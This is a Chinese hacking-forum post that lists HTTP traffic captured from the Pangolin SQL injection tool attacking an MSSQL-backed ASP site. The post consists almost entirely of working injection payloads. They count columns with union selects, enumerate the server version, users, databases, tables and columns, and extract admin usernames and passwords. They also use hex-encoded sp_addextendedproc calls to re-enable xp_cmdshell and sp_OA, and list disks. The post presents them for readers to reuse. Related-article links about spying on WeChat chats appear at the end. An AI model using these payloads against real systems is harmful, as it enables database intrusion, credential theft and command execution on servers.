穿山甲MSSQL注射抓包(部分)

访客4年前黑客文章1063

作者:TheLostMind

看了下穿山甲,很牛X的工具,抓了下包,随便整理了以下,无聊时看看……
===============================================
Target url is : http://www.xxx.com/news.asp?class_id=1165
HTTP Method is : GET
Inject type is : Integer
Do you really want to delete it?
Field count is : 14
The field's count 14
The string field position at 2

抓包内容:

union all select null-- and 1=1

union all select null,null-- and 1=1

union all select null,null,null-- and 1=1

这里省略…………………………………………
union all select null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select cast

(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar

(8000)),null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select null,cast

(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar

(8000)),null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select null,cast(db_name() as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

获取综合信息:

and 1=2 union all select null,cast(@@version as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(db_name() as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(@@servername as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(system_user as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(user as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(is_member(0x640062005f006f0077006e0065007200) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 3 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 4 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


这里省略……………………

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 40 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


;drop table foofoofoo;-- and 1=1


;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));-- and 1=1


;insert foofoofoo exec master.dbo.xp_availablemedia;-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([type] as nvarchar(4000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from

foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1

;drop table foofoofoo;-- and 1=1

;create table foofoofoo(name nvarchar(255),description nvarchar(4000));-- and 1=1

;insert foofoofoo exec master.dbo.xp_enumgroups;-- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([description] as nvarchar(4000)) as

nvarchar(4000)) ,null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top

1 * from foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1

;drop table foofoofoo;-- and 1=1


获取表:
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where

xtype=char(85) and status>0--

and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 1

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--


and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 2

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--

这里省略………………

and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 15

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--

获取列:
and 1=2 union all select top 1 null,cast(cast(id as nvarchar(20)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where

name=0x73006b0079005f005500730065007200--

and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[syscolumns] where

id=2068202418--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

1 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

2 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

这里省略……………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

10 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

11 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

获取内容:

and 1=2 union all select null,cast(cast(count(*) as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sky_user] where 1=1--

and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 1 id

from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top

1 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select

top 1 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--


and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 2 id

from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top

2 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select

top 2 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--


恢复XP_CMDSHELL:

and substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00) as nvarchar(4000)),

1, 1)>8


;exec master.dbo.sp_addextendedproc 0x780070005f0063006d0064007300680065006c006c00,

0x780070006c006f006700370030002e0064006c006c00--


恢复SP_OA……
;exec master.dbo.sp_addextendedproc 0x730070005f004f004100430072006500610074006500,

0x780070006c006f006700370030002e0064006c006c00--


列磁盘:
;drop table foofoofoo;--

;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--


;insert foofoofoo exec master.dbo.xp_availablemedia;--


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000))cast([type] as nvarchar(4000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from

foofoofoo order by [name] group by name) t order by [name] desc)t--

;drop table foofoofoo;--


不抓了。。。。自己抓吧………………
==============================================

标签: 好话题

相关文章

黑客可以查微信聊天记录吗黑客只要知道微信号就能监控

 根据《GSMA:2019年全球移动经济报告》和《华为GIV 2025》的预测,到2025年全球5G用户数量将达到28亿,IoT联接数量将达到1000亿。企业办公视频会议、移动教学、远程医疗对图像...

怎么样才能查询别人微信聊天记录 微信删除聊天后怎么查看聊天记录

黑客原来是这样远程攻击劫持安卓手机 四年前,知名黑客安排东方联盟的安全研讨人员发现了一种运用名为Rowhammer的黑客技术长途劫持Android手机的有用方法。 怎么样才能查询别人微信聊天记录...

保护个人信息安全不做信息时代的 透明人_个人信息

保护个人信息安全,不做信息时代的“透明人”,在消息时代大踏步进步的本日,人们在享用消息社会带来的智能、高效、方便的同时,也对消息平安…深感忧愁。“消息裸奔”让人们成为“通明人”,隐衷泄漏层见叠出,财富...

魅力企业网站管理系统 2009 SP3 中英繁漏洞

源码下载http://down.chinaz.com/soft/19655.htm 官方网站http://www.melyysoft.com/ 漏洞等级:高 Google搜索:"0351-606189...

雪诺被爆出轨多名女模 订婚后多次偷腥_欧盟

《权力的游戏》“雪诺”基特·哈灵顿与“耶哥蕊特”萝斯·莱斯利戏外也成了一对,去年9月订婚,今年6月结婚。但近日,推特账号EUTkings发布了哈灵顿的多张床照,称一名俄罗斯女学妹表示与哈灵顿“厮混”了...

WinAsm Studio .wap项目文件处理堆溢出漏洞

影响版本:WinAsm Studio 5.1.5.0漏洞描述:BUGTRAQ  ID: 34132 WinAsm Studio是用于使用汇编器开发32位Windows和16位DOS程序的免费集成开发环...